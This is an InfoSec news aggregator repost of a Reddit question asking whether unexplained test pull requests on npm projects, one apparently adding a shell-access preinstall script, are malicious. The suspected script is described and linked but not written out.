all InfoSec news
Random pull request on public JS project repos using NPM
Jan. 1, 2023, 8:19 a.m. | /u/bitingstack
cybersecurity www.reddit.com
He's opening and closing pull requests (like [this one](https://github.com/deliveroo/merge-pr-to-branch/pull/38)) on projects using NPM, with "test" file changes on \`.gitignore\` and \`package.json\`.
[One PR](https://github.com/npm/statusboard/pull/616/files) seem to have a shell access preinstall script? [screenshot](https://imgur.com/4VV9aKG)
Is this malicious? If it is anybody knows which CVE is this?
automated cve cybersecurity exploits find github malicious npm project public random repos request workflows
More from www.reddit.com / cybersecurity
Jobs in InfoSec / Cybersecurity
SOC 2 Manager, Audit and Certification
@ Deloitte | US and CA Multiple Locations
Werkstudent (w/m/d) - Cyber Security
@ IONOS | Karlsruhe, Germany
Security Operations Manager
@ BambooHR | Utah | Hybrid
Senior Risk and Compliance Analyst
@ Cricket.com | Hyderabad
Cyber Security Architect
@ Lilium | Munich
Senior Security Analyst
@ BETSOL | Bengaluru, India